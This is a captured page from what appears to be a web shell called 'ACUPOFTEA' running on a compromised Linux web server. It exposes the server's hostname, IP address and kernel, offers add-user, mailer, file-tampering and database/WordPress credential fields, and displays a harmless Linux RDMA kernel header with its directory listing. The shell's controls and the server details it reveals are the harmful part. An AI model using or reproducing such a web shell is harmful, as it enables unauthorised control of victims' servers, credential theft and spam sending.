System
:
Linux server1.ontime-gulf.com 4.18.0-553.5.1.el8_10.x86_64 #1 SMP Wed Jun 5 09:12:13 EDT 2024 x86_64
Software
:
Apache
Server
:
162.0.230.206
Domains
:
40 Domain
Permission
:
[
drwxr-xr-x
]
:
/
usr
/
include
/
rdma
/
216.73.216.6
Select
Submit
Home
Add User
Mailer
About
DBName
DBUser
DBPass
DBHost
WpUser
WpPass
Input e-mail
ACUPOFTEA for mail.ontime-ae.com made by tabagkayu.
Folder Name
File Name
File Content
File
rvt-abi.h
/* SPDX-License-Identifier: (GPL-2.0 OR BSD-3-Clause) */ /* * This file contains defines, structures, etc. that are used * to communicate between kernel and user code. */ #ifndef RVT_ABI_USER_H #define RVT_ABI_USER_H #include <linux/types.h> #include <rdma/ib_user_verbs.h> #ifndef RDMA_ATOMIC_UAPI #define RDMA_ATOMIC_UAPI(_type, _name) struct{ _type val; } _name #endif struct rvt_wqe_sge { __aligned_u64 addr; __u32 length; __u32 lkey; }; /* * This structure is used to contain the head pointer, tail pointer, * and completion queue entries as a single memory allocation so * it can be mmap'ed into user space. */ struct rvt_cq_wc { /* index of next entry to fill */ RDMA_ATOMIC_UAPI(__u32, head); /* index of next ib_poll_cq() entry */ RDMA_ATOMIC_UAPI(__u32, tail); /* these are actually size ibcq.cqe + 1 */ struct ib_uverbs_wc uqueue[]; }; /* * Receive work request queue entry. * The size of the sg_list is determined when the QP (or SRQ) is created * and stored in qp->r_rq.max_sge (or srq->rq.max_sge). */ struct rvt_rwqe { __u64 wr_id; __u8 num_sge; __u8 padding[7]; struct rvt_wqe_sge sg_list[]; }; /* * This structure is used to contain the head pointer, tail pointer, * and receive work queue entries as a single memory allocation so * it can be mmap'ed into user space. * Note that the wq array elements are variable size so you can't * just index into the array to get the N'th element; * use get_rwqe_ptr() for user space and rvt_get_rwqe_ptr() * for kernel space. */ struct rvt_rwq { /* new work requests posted to the head */ RDMA_ATOMIC_UAPI(__u32, head); /* receives pull requests from here. */ RDMA_ATOMIC_UAPI(__u32, tail); struct rvt_rwqe wq[]; }; #endif /* RVT_ABI_USER_H */
New name for
Are you sure will delete
?
New date for
New perm for
Name
Type
Size
Permission
Last Modified
Actions
.
DIR
-
drwxr-xr-x
2025-10-28 10:57:27
..
DIR
-
drwxr-xr-x
2025-10-28 10:57:27
hfi
DIR
-
drwxr-xr-x
2025-10-28 10:57:27
bnxt_re-abi.h
text/x-c
3.43 KB
-rw-r--r--
2025-10-27 03:42:53
cxgb4-abi.h
text/x-c
3.05 KB
-rw-r--r--
2025-10-27 03:42:53
efa-abi.h
text/x-c
2.89 KB
-rw-r--r--
2025-10-27 03:42:53
hns-abi.h
text/x-c
2.16 KB
-rw-r--r--
2025-10-27 03:42:53
ib_user_ioctl_cmds.h
text/plain
9.21 KB
-rw-r--r--
2025-10-27 03:42:53
ib_user_ioctl_verbs.h
text/x-c
7.7 KB
-rw-r--r--
2025-10-27 03:42:53
ib_user_mad.h
text/x-c
8.33 KB
-rw-r--r--
2025-10-27 03:42:53
ib_user_sa.h
text/x-c
2.25 KB
-rw-r--r--
2025-10-27 03:42:53
ib_user_verbs.h
text/x-c
28.29 KB
-rw-r--r--
2025-10-27 03:42:53
irdma-abi.h
text/x-c
2.14 KB
-rw-r--r--
2025-10-27 03:42:53
mana-abi.h
text/x-c
1.16 KB
-rw-r--r--
2025-10-27 03:42:53
mlx4-abi.h
text/x-c
5 KB
-rw-r--r--
2025-10-27 03:42:53
mlx5-abi.h
text/x-c
13.54 KB
-rw-r--r--
2025-10-27 03:42:53
mlx5_user_ioctl_cmds.h
text/x-c
10.49 KB
-rw-r--r--
2025-10-27 03:42:53
mlx5_user_ioctl_verbs.h
text/x-c
3.5 KB
-rw-r--r--
2025-10-27 03:42:53
mthca-abi.h
text/x-c
2.98 KB
-rw-r--r--
2025-10-27 03:42:53
ocrdma-abi.h
text/x-c
4.02 KB
-rw-r--r--
2025-10-27 03:42:53
qedr-abi.h
text/x-c
4.21 KB
-rw-r--r--
2025-10-27 03:42:53
rdma_netlink.h
text/x-c
14.64 KB
-rw-r--r--
2025-10-27 03:42:53
rdma_user_cm.h
text/x-c
6.96 KB
-rw-r--r--
2025-10-27 03:42:53
rdma_user_ioctl.h
text/x-c
3.66 KB
-rw-r--r--
2025-10-27 03:42:53
rdma_user_ioctl_cmds.h
text/x-c
2.55 KB
-rw-r--r--
2025-10-27 03:42:53
rdma_user_rxe.h
text/x-c
4.67 KB
-rw-r--r--
2025-10-27 03:42:53
rvt-abi.h
text/x-c
1.7 KB
-rw-r--r--
2025-10-27 03:42:53
siw-abi.h
text/x-c
3.32 KB
-rw-r--r--
2025-10-27 03:42:53
vmw_pvrdma-abi.h
text/x-c
7.82 KB
-rw-r--r--
2025-10-27 03:42:53
~ ACUPOFTEA - mail.ontime-ae.com